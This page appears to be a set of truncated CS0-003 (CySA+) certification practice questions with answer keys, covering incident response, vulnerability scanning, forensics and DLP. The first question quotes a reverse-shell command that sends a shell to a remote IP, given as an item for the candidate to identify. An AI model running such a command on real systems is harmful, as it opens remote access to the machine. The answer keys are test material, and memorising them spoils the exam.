CS0-003 exam

A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l Which of the following is being attempted?A . RCEB . Reverse shellC . XSSD . SQL injectionView AnswerAnswer: B Explanation: A reverse shell is a type of shell access that allows a remote user...

A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the...

A security analyst performs a weekly vulnerability scan on a network that has 240 devices and receives a report with 2.450 pages. Which of the following would most likely decrease the number of false positives?A . Manual validationB . Penetration testingC . A known-environment assessmentD . Credentialed scanningView AnswerAnswer: D...

An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?A . Hard diskB . Primary boot partitionC...

Given the Nmap request below: Which of the following actions will an attacker be able to initiate directly against this host?A . Password sniffingB . ARP spoofingC . A brute-force attackD . An SQL injectionView AnswerAnswer: C Explanation: The Nmap command given in the question performs a TCP SYN scan...

A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script: Which of the following scripting languages was used in the script?A . PowerShelB . RubyC . PythonD ....

A digital forensics investigator works from duplicate images to preserve the integrity of the original evidence. Which of the following types of media are most volatile and should be preserved? (Select two).A . Memory cacheB . Registry fileC . SSD storageD . Temporary filesystemsE . Packet decodingF . Swap volumeView...

A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?A . CVSS: 31/AV: N/AC: L/PR: N/UI: N/S: U/C:...

Which of the following tools would work best to prevent the exposure of PII outside of an organization?A . PAMB . IDSC . PKID . DLPView AnswerAnswer: D Explanation: Data loss prevention (DLP) is a tool that can prevent the exposure of PII outside of an organization by monitoring, detecting,...

During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which...